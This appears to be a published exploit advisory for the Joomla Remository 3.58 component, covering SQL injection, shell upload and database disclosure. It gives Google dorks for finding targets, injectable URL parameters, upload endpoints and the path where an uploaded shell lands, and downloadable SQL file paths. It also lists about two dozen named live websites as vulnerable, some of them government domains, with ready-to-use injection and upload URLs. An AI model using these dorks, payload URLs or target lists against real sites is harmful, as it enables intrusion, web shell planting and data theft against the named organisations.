Joomla Remository Components 3.58 Multiple Vuln

1. ####################################################################
2.  
3. # Exploit Title : Joomla Remository Components 3.58 SQL Injection / Database Disclosure / Shell Upload
4. # Author [ Discovered By ] : KingSkrupellos
5. # Team : Cyberizm Digital Security Army
6. # Date : 30/01/2019
7. # Vendor Homepage : remository.com
8. # Software Download Link : remository.com/downloads/joomla-3.x-software/
9. # Software Information Link : extensions.joomla.org/extension/remository/
10. # Software Version : 3.58
11. # Tested On : Windows and Linux
12. # Category : WebApps
13. # Exploit Risk : Medium
14. # Google Dorks : inurl:''/index.php?option=com_remository''
15. inurl:''/administrator/components/com_remository/''
16. intext:Site Designed By Conservation Designs
17. intext:CCCV Gabriel Valencia site:gob.ec
18. intext:Web creada por softdream.es
19. intext:Sponsored by Innovatron - Managed by Spirtech
20. intext:COST Action IC0902, Powered by Joomla! and designed by SiteGround Joomla Templates
21. intext:Web design by Mercury Web Solutions
22. intext:Joomla 2.5 Templates Designed by Joomla Templates Free.
23. intext:© 2001- 2019 by Bayerischer Sportschützenbund e.V.
24. # Vulnerability Type : CWE-89 [ Improper Neutralization of
25. Special Elements used in an SQL Command ('SQL Injection') ]
26. CWE-200 [ Information Exposure ]
27. CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
28. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
29. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
30. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
31. # Reference Link : cxsecurity.com/issue/WLB-2019010284
32. packetstormsecurity.com/files/151433/Joomla-Remository-3.58-Database-Disclosure-Shell-Upload-SQL-Injection.html
33.  
34. ####################################################################
35.  
36. # Description about Software :
37. ***************************
38.  
39. “Remository” is open source software for Joomla.
40.  
41. ####################################################################
42.  
43. # Impact :
44. ***********
45.  
46. *Attackers can exploit this issue via a browser.
47.  
48. The 'com_remository' component for Joomla! is prone to a vulnerability that lets attackers
49.  
50. upload arbitrary files/shell upload because the application fails to adequately sanitize user-supplied input.
51.  
52. An attacker can exploit this vulnerability to upload arbitrary code and run it in the
53.  
54. context of the webserver process. This may facilitate unauthorized access or
55.  
56. privilege escalation; other attacks are also possible.
57.  
58. * An attacker might be able inject and/or alter existing
59.  
60. SQL statements which would influence the database exchange.
61.  
62. * SQL injection vulnerability in the Joomla Remository Components 3.58 because,
63.  
64. it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
65.  
66. * Exploiting this issue could allow an attacker to compromise the application, read,
67.  
68. access or modify data, or exploit latent vulnerabilities in the underlying database.
69.  
70. If the webserver is misconfigured, read & write access to the filesystem may be possible.
71.  
72. ####################################################################
73.  
74. # SQL Injection Exploit :
75. **********************
76.  
77. /index.php?option=com_remository&Itemid=[SQL Injection]
78.  
79. /index.php?option=c&Itemid=[ID-NUMBER]&func=selectcat&cat=[SQL Injection]
80.  
81. /index.php?option=com_remository&Itemid=[ID-NUMBER]&func=select&id=[SQL Injection]
82.  
83. /index.php?option=com_remository&Itemid=[ID-NUMBER]&func=select&id=
84. [ID-NUMBER]&orderby=[SQL Injection]
85.  
86. /index.php?option=com_remository&Itemid=[ID-NUMBER]&func=select&id=[SQL Injection]
87.  
88. /index.php?option=com_remository&Itemid=[ID-NUMBER]&func=fileinfo&id=[SQL Injection]
89.  
90. /index.php?option=com_remository&Itemid=[ID-NUMBER]&func=select&id=
91. [ID-NUMBER]&orderby=[ID-NUMBER]&page=[SQL Injection]
92.  
93. /index.php?option=com_remository&Itemid=[ID-NUMBER]&func=download&id=
94. [ID-NUMBER]&chk=[HASH-NUMBERS-HERE]&no_html=[SQL Injection]
95.  
96. ####################################################################
97.  
98. # Arbitrary File Upload Exploit :
99. ****************************
100. /index.php?option=com_remository&Itemid=[ID-NUMBER]&func=addfile
101.  
102. /index.php?option=com_remository&Itemid=[ID-NUMBER]&func=addfile&parent=category
103.  
104. /index.php?option=com_remository&Itemid=[ID-NUMBER]&func=addmanyfiles
105.  
106. /index.php?func=addfile&id=[ID-NUMBER]&Itemid=[ID-NUMBER]&option=com_remository&datum=[DAY]-[MONTH]-[YEAR]
107.  
108. /index.php/shared-file-repository/func-addmanyfiles/
109.  
110. Directory File Path :
111. ******************
112.  
113. Search your file here.
114.  
115. /components/com_remository_files/file_image_[ID-NUMBER]/[RANDOM-NUMBERS]yourshell.php
116.  
117. /components/com_remository_files/......
118.  
119. Note : If websites are not vulnerable it says ;
120.  
121. You have no permitted upload categories - please refer to the webmaster
122.  
123. ####################################################################
124.  
125. # Database Disclosure Exploit :
126. ***************************
127.  
128. /administrator/components/com_remository/assignment.sql
129.  
130. /administrator/components/com_remository/blob.sql
131.  
132. /administrator/components/com_remository/containers.sql
133.  
134. /administrator/components/com_remository/file.sql
135.  
136. /administrator/components/com_remository/log.sql
137.  
138. /administrator/components/com_remository/permission.sql
139.  
140. /administrator/components/com_remository/repository.sql
141.  
142. /administrator/components/com_remository/reviews.sql
143.  
144. /administrator/components/com_remository/structure.sql
145.  
146. /administrator/components/com_remository/text.sql
147.  
148. ####################################################################
149.  
150. # Example Vulnerable Sites :
151. *************************
152.  
153. [+] temporalesunoa.com/dgtree/joomla/administrator/components/com_remository/repository.sql
154.  
155. [+] oceap.gov.ng/administrator/components/com_remository/remository.sql
156.  
157. [+] nacat.org/index.php?option=com_remository&Itemid=173&func=addfile&parent=category
158.  
159. [+] jdih.mahkamahagung.go.id/index.php?option=com_remository&Itemid=173&func=addfile&parent=category
160.  
161. [+] telecip.com.co/telecip/index.php?option=com_remository&Itemid=173&func=addfile&parent=category
162.  
163. [+] ics-casalserugo.gov.it/joomla/index.php?option=com_remository&Itemid=78&func=fileinfo&id=40%27
164.  
165. [+] cccv.gob.ec/web/index.php?option=com_remository&Itemid=67&func=select&id=8%27
166.  
167. [+] elsemillero.net/nuevo/index.php?option=com_remository&Itemid=165%27
168.  
169. [+] pymeschamartin.softdream.es/index.php?option=com_remository
170. &Itemid=7&func=select&id=5&orderby=5&page=3%27
171.  
172. [+] ohaysoft.com/index.php?option=com_remository&Itemid=116&func=
173. download&id=149&chk=4e4f957a2083a4f41e98e5d163e7bc37&no_html=1%27
174.  
175. [+] fullthrottlesimracing.net/main/index.php?option=com_remository&Itemid=60&func=select&id=3%27
176.  
177. [+] old.tpp.pulawy.pl/index.php?option=com_remository&Itemid=49&func=fileinfo&id=36%27
178.  
179. [+] b2biaxis.com/index.php?option=com_remository&Itemid=416&func=fileinfo&id=2%27
180.  
181. [+] concretedev.com/index.php?option=com_remository&Itemid=37%27
182.  
183. [+] lexcont.de/index.php?option=com_remository&Itemid=4%27
184.  
185. [+] cnawg.net/index.php?option=com_remository&Itemid=28&func=addfile
186.  
187. [+] parachutemanuals.com/index.php?option=com_remository&Itemid=41&func=addfile&id=52
188.  
189. [+] newyork.ing.uniroma1.it/IC0902/index.php?option=com_remository&Itemid=82&func=addfile
190.  
191. [+] kline.ca/index.php?option=com_remository&Itemid=38&func=addfile&id=1
192.  
193. [+] vldb.org/vldb_journal/index.php?option=com_remository&Itemid=60&func=addfile&id=13625
194.  
195. [+] seytpe.gr/25/index.php?option=com_remository&Itemid=100088&func=addmanyfiles
196.  
197. [+] blackburnwithdarwenlink.org.uk/index.php?option=com_remository&Itemid=11&func=addfile&id=25
198.  
199. [+] station-drivers.com/index.php?option=com_remository&Itemid=353&func=addfile&id=373&lang=en
200.  
201. [+] bssb.de/index.php?func=addfile&id=1215&Itemid=647&option=com_remository&datum=01-01-2018
202.  
203. ####################################################################
204.  
205. # SQL Database Error :
206. *********************
207.  
208. Strict Standards: Non-static method JLoader::import() should not be called
209. statically in /home/elsemillero/public_html/nuevo/libraries/joomla/import.php on line 29
210.  
211. Deprecated: Assigning the return value of new by reference is deprecated in
212. /home/epangsof/public_html/includes/joomla.php on line 836
213.  
214. Warning: Cannot modify header information - headers already sent by
215. (output started at /home/epangsof/public_html/includes/joomla.php:836) in
216. /home/epangsof/public_html/includes/joomla.php on line 697
217.  
218. Fatal error: Uncaught Error: Call to undefined function
219. set_magic_quotes_runtime() in /home4/hbman23/public_html/main
220. /includes/framework.php:21 Stack trace: #0 /home4/hbman23/public_html
221. /main/index.php(22): require_once() #1 {main} thrown in
222. /home4/hbman23/public_html/main/includes/framework.php on line 21
223.  
224. ####################################################################
225.  
226. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
227.  
228. ####################################################################